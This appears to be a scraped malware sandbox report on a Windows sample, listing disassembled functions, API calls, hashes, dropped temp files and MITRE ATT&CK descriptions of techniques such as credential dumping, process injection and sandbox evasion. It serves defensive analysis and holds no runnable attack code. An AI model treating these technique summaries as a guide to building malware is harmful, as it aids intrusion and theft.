Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 2b02d9fd971b862bfe979dc07a53a499beeeae87eaebee51f2fe50a3b1dae752
Instruction ID: 1a234345908062580f842b16de5032699374da21482d51ac0d986381739cac3a
Opcode Fuzzy Hash: 2b02d9fd971b862bfe979dc07a53a499beeeae87eaebee51f2fe50a3b1dae752
Instruction Fuzzy Hash: EFF0A5B0805109EBDB15DBA9CAD4BECBBF8AB08302F5404D6E502A31A1DB754F88DF60

Function 00B95998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B959AE
PostMessageW.USER32(00000000), ref: 00B959B5

Part of subcall function 00B75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B752BC

Strings

Shell_TrayWnd, xrefs: 00B959A7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f32949a9f324799afbe7518c86e3017d82032b7ba503d2241cc515a1efb9cf75
Instruction ID: f8713ab2b558b8b96d765581006377ce520b9be1cd7d372377834405ebab90a4
Opcode Fuzzy Hash: f32949a9f324799afbe7518c86e3017d82032b7ba503d2241cc515a1efb9cf75
Instruction Fuzzy Hash: 51D0C9317803127BE664AB709D0BFA76A55BB14B60F01086AB25AEB1E1CDE0A800C654

Function 00B95964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B9596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B95981

Part of subcall function 00B75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B752BC

Strings

Shell_TrayWnd, xrefs: 00B95967

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9ba5cd2bd7d3e86d5062cdcac8727a29a312fa184557b423a5b05263ea120e19
Instruction ID: e7e04703644310154589bc20a93ce91237acb478796467af682a010733ebf155
Opcode Fuzzy Hash: 9ba5cd2bd7d3e86d5062cdcac8727a29a312fa184557b423a5b05263ea120e19
Instruction Fuzzy Hash: A9D0C931784312B7E664AB709D1BFA76A55BB10B60F01086AB25AEB1E1CDE0A800C654

Function 00B693DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B693E9
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00B693F7

Strings

@U=u, xrefs: 00B693E9, 00B693F7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: d861c29313bc4b123529abdc628a571e22ed39485c8f9dac013b35df089791fa
Instruction ID: 04340f5085789258795c6f3dac4679471280e4571efe7365014d8fa64c035459
Opcode Fuzzy Hash: d861c29313bc4b123529abdc628a571e22ed39485c8f9dac013b35df089791fa
Instruction Fuzzy Hash: F0C00231141281BAEA211B77AD0DD973E3DE7CAF62711016DB211D60B58A6500A5D624

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AuKUol8SPU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autA4C4.tmp

C:\Users\user\AppData\Local\Temp\autA561.tmp

C:\Users\user\AppData\Local\Temp\biopsies

C:\Users\user\AppData\Local\Temp\colliquefaction

C:\Users\user\AppData\Local\Temp\o3Z6161

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
AuKUol8SPU.exe

Function 00B13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00B149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00B14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00B79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00B1301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00B13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00B1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00B13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00B13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00B13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 04102650 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre